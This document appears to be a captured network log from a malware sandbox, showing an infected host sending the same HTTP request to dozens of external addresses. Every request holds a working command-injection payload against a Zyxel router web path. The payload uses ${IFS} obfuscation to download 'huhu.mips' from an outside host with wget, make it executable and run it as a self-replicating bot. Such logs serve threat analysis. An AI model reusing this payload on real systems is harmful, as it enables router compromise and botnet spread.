                                      Jan 19, 2024 17:29:36.862843990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5497192.168.2.145945070.25.159.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862894058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5498192.168.2.1439452146.218.46.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862931967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5499192.168.2.143986239.152.125.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862979889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5500192.168.2.1439742210.220.11.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863033056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5501192.168.2.1445158148.174.60.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863059998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5502192.168.2.145065897.70.164.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863114119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5503192.168.2.1452722179.8.195.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863145113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5504192.168.2.144515691.111.18.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863193035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5505192.168.2.1437792178.111.37.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863210917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5506192.168.2.144984620.58.194.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863231897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5507192.168.2.14591462.128.13.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863257885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5508192.168.2.144809461.77.131.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863276005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5509192.168.2.144287246.26.251.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863306046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5510192.168.2.1453896115.119.195.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863347054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5511192.168.2.1453890161.60.175.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863394022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5512192.168.2.1459984222.99.188.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863435030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5513192.168.2.1439430178.1.36.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863470078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5514192.168.2.145420217.46.152.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863514900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5515192.168.2.1432856146.180.121.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863548994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5516192.168.2.1435898151.106.105.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863598108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5517192.168.2.1436942136.15.144.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863627911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5518192.168.2.145468092.74.191.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863663912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5519192.168.2.1455762112.100.1.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863701105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5520192.168.2.144308414.105.14.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863758087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5521192.168.2.1442180186.8.202.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863807917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5522192.168.2.1445028154.75.86.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863842964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5523192.168.2.1459084195.89.34.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863879919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5524192.168.2.1433742193.97.58.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863895893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5525192.168.2.144228043.117.210.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863909960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5526192.168.2.1446410123.3.51.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863964081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5527192.168.2.1434158208.215.218.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.863980055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5528192.168.2.1437928120.16.248.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864027023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5529192.168.2.1454724113.154.111.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864065886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5530192.168.2.145478023.133.61.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864130974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5531192.168.2.144522673.65.255.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864150047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5532192.168.2.1433586204.192.125.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864200115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5533192.168.2.144514847.198.11.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864240885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5534192.168.2.1450840114.186.135.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864273071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5535192.168.2.1435732126.232.159.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864298105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5536192.168.2.1449902197.126.235.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864331007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5537192.168.2.14586161.100.249.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864367008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5538192.168.2.145604699.200.134.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864387989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5539192.168.2.1443160153.185.140.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864443064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5540192.168.2.144629440.46.246.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864487886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5541192.168.2.1442910137.92.227.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864521980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5542192.168.2.1442460201.188.23.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864557028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5543192.168.2.14372309.14.77.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864584923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5544192.168.2.1442032200.141.116.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864635944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5545192.168.2.144025475.203.206.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864635944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5546192.168.2.145766070.156.69.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864708900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5547192.168.2.1436430199.152.120.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864754915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5548192.168.2.1439714153.227.145.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864772081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5549192.168.2.144429683.3.243.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864810944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5550192.168.2.1453670191.115.163.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864849091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5551192.168.2.1457250102.108.115.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864892006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5552192.168.2.1443844136.24.189.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864939928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5553192.168.2.1444544203.43.246.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.864989042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5554192.168.2.143656825.197.15.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865015984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5555192.168.2.145836293.115.190.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865063906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5556192.168.2.1435772102.4.48.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865092993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5557192.168.2.143663413.107.221.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865123034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5558192.168.2.145816045.96.108.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865165949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5559192.168.2.1439790158.75.106.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865212917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5560192.168.2.1441322146.53.128.150443
                                      TimestampBytes transferredDirectionData
